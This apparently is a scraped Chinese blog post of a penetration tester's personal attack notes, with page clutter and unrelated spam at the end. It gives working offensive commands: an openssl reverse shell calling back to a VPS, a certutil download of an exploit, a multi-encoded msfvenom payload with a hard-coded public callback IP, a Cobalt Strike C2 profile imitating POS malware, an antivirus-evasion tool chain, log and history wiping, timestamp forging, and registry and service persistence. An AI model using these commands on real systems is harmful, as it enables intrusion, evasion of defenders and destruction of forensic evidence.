<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    個人滲透技巧匯總筆記( 壓箱底,建議收藏)

    一顆小胡椒2023-02-24 11:26:12

    前言

    首先我們拿到一個站不能心急,凡事三思而行 跑得太快是會滑倒的。網絡安全方面可以看看我的另一篇防范技巧。

    當我們獲得目標的時候不要急著用掃描器,這樣會不僅會影響服務器的速度還會在對方的服務器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點b數,不然可能等待的就是不一樣的結果了。如果手工測試無果后再用代理手法掃描網站,必要的時候設置二級代理。當然!!!!什么站能掃什么站不能掃,心里一定要有點b數!小提示:在使用proxychains的時候,程序或者終端選項盡量不要設置任何協議的代理,否則可能會打亂這個代理回路出現網絡錯誤。

    淺藍的滲透測試導圖以及小工具

    這里有一個更加詳細的導圖,可以做一個大致的方向參考,跟著方向逐一測試,期間也可以鞏固基礎。地址在這

    關注公眾號:hack之道,后臺回復關鍵詞:666,獲取最新滲透教程和工具。

    這里再附一個滲透工具包,幫助新手熟悉滲透測試:gorailgun滲透工具

    AWVS + Nessus docker

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    1
    
    # 拉取鏡像
      docker pull leishianquan/awvs-nessus:v1
      # 啟動
      docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
      # 查看容器
      docker ps –a
      # 啟動容器
      docker start container-id
      # 進入容器
      docker exec –it container-id /bin/bash
    
      # 進入容器后,啟動nessus
      /etc/init.d/nessusd start
    
      # 訪問掃描器地址和賬號密碼
      Nessus:
      https://127.0.0.1:8834/#/
      account:leishi/leishianquan
    
      Awvs13:
      https://127.0.0.1:13443/
      account:admin@admin.com/Admin123
    


    ZERO

    首先進行信息收集你獲得的信息越多對自己后面的滲透就越有幫助,whois,旁站子域,服務器操作系統版本,web中間件以及waf與cdn,通過google與github看看是否存在已知的漏洞這樣有助于快速的獲得權限,端口掃描并判斷服務漏洞加以利用,目錄的fuzz,弱口令的fuzz,google hack 進一步探測網站的信息后臺以及敏感信息,撒旦天眼也是不錯的信息工具。這里也推薦一個公眾號:酒仙橋六號補丁

    一.時刻關注返回的數據包

    漏洞有很多種類型都需要滲透方認證仔細的對每個數據包已經url進行驗證,要相信所有的努力都是為成功而付出的。如XSS,XSRF,sql注入,代碼執行,命令執行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,遠程命令執行,弱口令,上傳,編輯器漏洞,暴力破解等

    驗證碼與郵箱以及token的返回泄露,以及后臺為校驗從而可刪除的參數。截獲的敏感數據參數,學會在多個數據包反復嘗試。從某個成功請求中捕獲數據包觀察cookie或者token是否存在規律或加密。通過修改返回的狀態值,觸發js進行邏輯漏洞的滲透。token的key參數解密構建獲取真實user密鑰,可拼接、規律、時間戳……

    二.FUZZ的藝術

    https://www.freebuf.com/vuls/221129.html

    三.WEBBYPASS

    linux反彈 shell:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    
    1)VPS 上生成 ssl 證書的公鑰/私鑰對:
    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    2)VPS 監聽反彈 shell:
    openssl s_server -quiet -key key.pem -cert cert.pem -port 80
    3)目標上回連 shell:
    mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s
    
    VPS 上已獲取加密的 getshell 了。
    


    winodws桌面:TeamViewerQS單文件

    windows下載文件;

    certutil -urlcache -split -f https://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.py test.py

    腳本反彈內網:reGeorg

    1.將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務器,訪問顯示“Georg says, ‘All seems fine’“,表示腳本運行正常。

    2.在攻擊者機器上,啟動reGeorgSocksProxy.py,監聽9999端口,看到 Checking if Georg is ready,確認正常運行,這個時候就可以吧目標機作為跳板了。

    waf:中國蟻劍客戶端,冰蝎與內存馬,反復嘗試使用編碼字節繞過

    四.提權與權限維持

    首先通過檢查目標服務器的進程與可利用服務以及漏洞

    ssl加密payload

    1
    2
    3
    4
    5
    6
    7
    8
    9
    ###生成證書并寫入文件
    openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt
    
    cat  rsaprivate.key servercertificate.crt >my.pem
    ###生成payload
    msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw
    
    ###監聽
    msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
    
    老牌工具Cobaltstrike+Profiles

    上云和隱藏流量參考free教程

    1.利用keytool生成自己的免費證書(可在kali上生成)

    keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
    

    2.C2.profile文件編輯

    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    set sample_name "tryblog POS Malware";
    
    set sleeptime "5000"; # use a ~30s delay between callbacks
    set jitter    "10";    # throw in a 10% jitter
    
    set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
    
    #設置證書,注意以下內容得和你之前生成的證書一樣
    https-certificate {
        set CN       "TRY"; 
        set O        "TRY";   
        set C        "TRY";
        set L        "TRY";
        set OU       "TRY";  
        set ST       "TRY";
        set validity "365";
    }
    #設置,修改成你的證書名稱和證書密碼
    code-signer{
        set keystore "tryblog.store";
        set password "tryblog";
        set alias "tryblog";
    }
    
    #指定DNS beacon不用的時候指定到IP地址
    set dns_idle "8.8.4.4";
    
    #每個單獨DNS請求前強制睡眠時間
    set dns_sleep "0";
    
    #通過DNS上載數據時主機名的最大長度[0-255]
    set maxdns    "235";
    
    http-post {
        set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    
        client {
            header "Accept" "text/plain";
            header "Accept-Language" "en-us";
            header "Accept-Encoding" "text/plain";
            header "Content-Type" "application/x-www-form-urltrytryd";
    
            id {
                netbios;
                parameter "id";
            }
    
            output {
                base64;
                prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
                print;
            }
        }
    
        server {
            output {
                print;
            }
        }
    }
    
    http-get {
        set uri "/updates";
    
        client {
            metadata {
                netbiosu;
                prepend "user=";
                header "Cookie";
            }
        }
    
        server {
            header "Content-Type" "text/plain";
    
            output {
                base64;
                print;
            }
        }
    }
    

    3.驗證c2lint,啟動服務端,載入漢化運行

    1
    2
    3
    ./c2lint C2.profile
    ./teamserver ip:prot ./C2.profile 
    java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC  -jar cobaltstrike.jar
    


    免殺遠控整理(來自Tide團隊)

    項目地址:https://github.com/QChiLan/BypassAntiVirus


    windows下的免殺生成(順序從上到下依次混淆)

    如果需要捆綁正常軟件運行使用shellter,如不能過免殺,再分步測試以下操作。cs文件編碼混淆用AVIATOR生成。測試可以再用python再當前目錄打開一個web服務器:

    python3 -m http.server 8080
    

    1.Lime-Crypter 注入線程

    2.DeepSeaOBFuscator 封裝

    3.CryptoObfuscator 混淆

    4.https 證書修改

    5.base64prionx 混淆

    6.themida 加殼

    7.https 證書修改

    8.viper(在線msf處理平臺可加特征和簽名很方便)

    *通用免殺法(簡單概括就是1.修改特征碼2.花指令免殺3.加殼免殺。)

    也可以通過把軟件分塊用殺軟重復掃描找到特征碼進行修改,當然也可以通過加載器的形式更加靠譜但是需要落地多個文件,c#文件自己封裝推薦avator+掩蓋日可以過火絨

    Veil

    Veil是一種免殺生成工具,用于生成繞過常見防病毒解決方案的metasploit有效負載。

    一些payload加料的技巧

    1、通過ssl與加殼加密palyoad(免殺)

    2、通過dns或套cdn傳輸

    windows

    Exploit批量掃描:Windows-Exploit-Suggester

    漏洞模塊:https://github.com/SecWiki/windows-kernel-exploits

    BITS免殺提權:https://github.com/ohpe/juicy-potato

    linux

    搜尋配置文件中的明文密碼、sudo濫用

    Exploit批量掃描:linux-exploit-suggester、linux-exploit-suggester-2

    漏洞模塊:https://github.com/SecWiki/linux-kernel-exploits

    五、日志清理(細心的安全工程師會更改位置并定時備份后滲透主要還是靠細心)

    windows

    遇見不能刪除的先停止相關服務:net stop “task scheduler”

    系統日志推薦使用工具:clearlog.exe

    msf清理:clearev ,run event_manager -c

    1
    2
    3
    4
    5
    6
    7
    8
    防火墻日志路徑:%systemroot%\system32\logfiles\
    IIS日志路徑:%systemroot%\system32\logfles\
    windows系統日志:%systemroot%\system32\config\
    Scheduler服務日志:%systemroot%\schedlgu.txt
    日志在注冊表的鍵:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
    系統日志:%SystemRoot%\System32\Winevt\Logs\System.evtx
    安全日志:%SystemRoot%\System32\Winevt\Logs\Security.evtx
    應用程序日志:%SystemRoot%\System32\Winevt\Logs\Application.evtx
    
    linux(檢索根目錄以及上級目錄是否存在備份)

    1.清空當前用戶歷史命令并刪除相關文件:

    history -c

    echo “”> /root/.bash_history

    echo “”> /var/run/utmp

    2.清除部分日志:echo “”> /var/log/secure;全刪除如不能刪除使用echo依次覆蓋:rm -f -r /var/log/*;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    /var/log/boot.log:錄了系統在引導過程中發生的事件,就是Linux系統開機自檢過程顯示的信息
    
    /var/log/lastlog :記錄最后一次用戶成功登陸的時間、登陸IP等信息
    
    /var/log/messages :記錄Linux操作系統常見的系統和服務錯誤信息
    
    /var/log/secure :Linux系統安全日志,記錄用戶和工作組變壞情況、用戶登陸認證情況
    
    /var/log/btmp :記錄Linux登陸失敗的用戶、時間以及遠程IP地址
    
    /var/log/syslog:只記錄警告信息,常常是系統出問題的信息,使用lastlog查看
    
    /var/log/wtmp:該日志文件永久記錄每個用戶登錄、注銷及系統的啟動、停機的事件,使用last命令查看
    
    /var/log/maillog 與郵件相關的日志信息
    
    /var/log/cron 與定時任務相關的日志信息
    
    /var/log/spooler 與UUCP和news設備相關的日志信息
    
    /var/log/auth.log 系統授權信息,包括用戶登錄和使用的權限機制等 (debian)
    
    /var/run/utmp:該日志文件記錄有關當前登錄的每個用戶的信息。如 who、w、users、finger等就需要訪問這個文件
    

    3.更新test.txt的時間和test2.txt時間戳相同:touch -r test.txt test2.txt;設定時間戳:touch -t 201605171210.20 test.txt

    web容器路徑

    數據庫通過查詢配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml)

    winodws

    1
    2
    3
    apche:C:\Program Files\Apache Software Foundation\Apache2.2\htdocs"
    tomact:C\Program Files\tomcat\log
    nignx: C\Program Filesginx-1.14.2\logs\
    


    linux

    1
    2
    3
    tomcat:/usr/local/tomcat/logs/
    apche:/usr/local/apache/logs/access_log
    nignx:/var/log/httpd/error_log  rm -f -r /var/log/*
    


    七、后滲透與流量隱匿

    frsocks+protoplex+流量重定向實現端口復用

    protoplex是一個協議復用的工具,比如以下命令可將本地9999端口的流量根據協議類型轉到本地的2333和80端口。用于繞過云主機的nsg安全規則。

    ./frsocks -sockstype fsocks -listen 2333  //創建本地監聽
    ./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流,根據協議類型轉到本地的2333和80端口
    

    重定向命令

    linux:

    sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
    

    windows:

    netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
    1
    2
    netsh interface portproxy show all //查看轉發規則
    netsh interface portproxy reset   //清除所有轉發規則
    
    將 IP 流量封裝進 IMCP 的 ping 數據包進行傳輸

    工具如下

    1、icmptunnel:https://github.com/jamesbarlow/icmptunnel

    2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/

    3、icmpsh:https://github.com/inquisb/icmpsh

    4、Powershell-ICMP:https://github.com/api0cradle/Powershell-ICMP

    5、復雜的網絡環境可以使用EarchWorm(ew)實現多級代理訪問目標主機

    后滲透

    ps:合理利用后滲透插件可以剩下很多時間,但是要注意痕跡清理。插件有謝公子和梼杌完整版比較常用,Cobaltstrike推薦插件:謝公子、梼杌、Z1-AggressorScripts、ladong


    詳情參考這個:

    https://blog.csdn.net/qq_33020901/article/details/98357659

    添加開機自啟


    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f 
    
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "test" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f
    1
    2
    3
    4
    5
    6
    sc create "server power" binpath= "C:\Windows\System32\config.exe"
    //設置服務的描述字符串
    sc description "server power" "description" 
    //設置這個服務為自動啟動
    sc config "server power" start= auto 
    net start "server power" 啟動服務
    

    八、 一個便捷的HACK瀏覽器(上火狐開發者版本也不錯)

    這里個人做一個備份有需求的自行google,解釋一下英文的插件功能。

    Ajax Interceptor:可以自定義ajax的json返回值,前端測試用。

    Anti-HoneyPot:紅隊用,可以檢查網頁中的蜜罐鏈接并提示。

    ApiRequest.io Ajax Capture Debugging Tool:這個是神器!!強推,可以測試網頁中任何的ajax請求包括跨站ajax請求重放,官網提供了只30天的請求歷史記錄記得保存重要請求。

    Decentraleyes:可以攔截一些cdn和本地的文件跟蹤器

    APK Downloader for Google Play Store :免google框架在線下載應用商店的app。

    Buster Captcha Solver for Humans:過goole驗證碼,有時候識別會比較慢。

    Easy WebRTC Block:干掉webrtc的ip回顯,避免泄露真實ip

    IP Whois & Flags Chrome & Websites Rating:自動在后臺測試當前網站ip的歸屬地然后以小圖標的形式返回給前臺非常便捷,點擊進去還可以看到cdn以及whois信息。

    NoScript: 慎用,此插件可以強力的攔截網頁上的追蹤器來保護用戶的隱私與真實信息,但是會造成許多網站打開異常。

    Identify web technologies :可以幫你分析當前網站所使用的網絡技術與框架。

    Shodan:網絡搜索引擎同fofa與鐘馗之眼,互聯網設備大殺器

    Picture-in-Picture Extension:畫中畫懸浮窗口看視頻

    SourceDetector:可以再后臺默默的掃描是否有源代碼泄露

    HackTools:方便懶人使用點擊擴展可快速復制sql,xss,反彈shell。

    httpslog
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    隨著時間的推移,舊的漏洞會不斷消失,而這個Log4j中的RCE漏洞可能需要幾年的時間才能得到妥善解決。
    國家互聯網信息辦對《網絡數據安全管理條例》公開征求意見。
    最近這log4j熱度很高。好久沒寫文章了,而且目前市面有些文章里面的內容信息已經有些過時缺少最新信息迭代,借此機會我劍指系列基于國內外的關于此漏洞的研究我進行了總結和歸納,并且將我自己目前發現的小眾的技巧方法分享給各位,希望能給各位帶來幫助不會讓各位失望。
    騰訊云容器安全服務團隊通過犀引擎發現較多鏡像受ApacheLog4j2遠程代碼執行漏洞影響,存在較高風險!為助力全網客戶快速修復漏洞,免費向用戶提供試用,登錄控制臺(https://console.cloud.tencent.com/tcss)即可快速體驗。
    近日,Apache官方發布了多個安全漏洞的公告,包括Apache log4j 代碼問題漏洞(CNNVD-202201-1425、CVE-2022-23307)、Apache Log4j SQL注入漏洞(CNNVD-202201-1421、CVE-2022-23305)、Apache log4j 代碼問題漏洞(CNNVD-202201-1420、CVE-2022-23302)等。成功利用上述漏洞的攻
    騰訊云安全運營中心監測到,Apache Log4j2 官方發布公告提示其在某些特殊場景下存在遠程代碼執行漏洞,漏洞編號CVE-2021-44832。該漏洞僅在攻擊者擁有修改配置文件權限時才可遠程執行任意代碼,漏洞利用難度較大。 為避免您的業務受影響,騰訊云安全建議您及時開展安全自查,如在受影響范圍,請您及時進行更新修復,避免被外部攻擊者入侵。
    近期,“核彈級漏洞” Apache Log4j2 遠程代碼執行漏洞細節被公開,攻擊者利用漏洞可以遠程執行代碼。 Apache Log4j2 是一款優秀的 Java 日志框架,該工具重寫了 Log4j 框架,并且引入了大量豐富的特性。該日志框架被大量用于業務系統開發,用來記錄日志信息。 漏洞原理簡述
    近日,Apache官方發布了多個安全漏洞的公告,包括Apache log4j 代碼問題漏洞(CNNVD-202201-1425、CVE-2022-23307)、Apache Log4j SQL注入漏洞(CNNVD-202201-1421、CVE-2022-23305)、Apache log4j 代碼問題漏洞(CNNVD-202201-1420、CVE-2022-23302)等。成功利用上述漏洞的攻
    蜜罐接口抓取分享
    2022-07-15 08:34:54
    0x01 前言事情是這樣的,和以前一樣正常打開土司逛論壇,發覺到一篇關于踩了京東蜜罐的文章。就跟著這個師傅的文章泄露的關鍵點:某物流-物控平臺-登錄,結合起來去fofa搜下就能找到了然后淡定的打開隱私模式進行訪問這個,進行踩蜜罐抓一波接口,還是逮到蠻多接口的。
    繞過登錄頁面的七種常見方法這篇文章是關于繞過由于網站的弱點而發生的登錄頁面功能。常見的七種方式繞過 SQL 注入通過跨站點腳本通過操縱響應返回包繞過爆破攻擊限制繞過目錄爆破攻擊默認憑據繞過通過刪除請求中的參數繞過 SQL 注入我以 Mutillidae 為例進行演示。我們以管理員身份登錄。在您的情況下,當它不起作用時嘗試其他payload,并使用 SQLMap 工具dump用戶名和密碼。并顯示彈出窗口,因此您可以通過 XSS 嘗試 CSRF 并查看受害者憑據。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类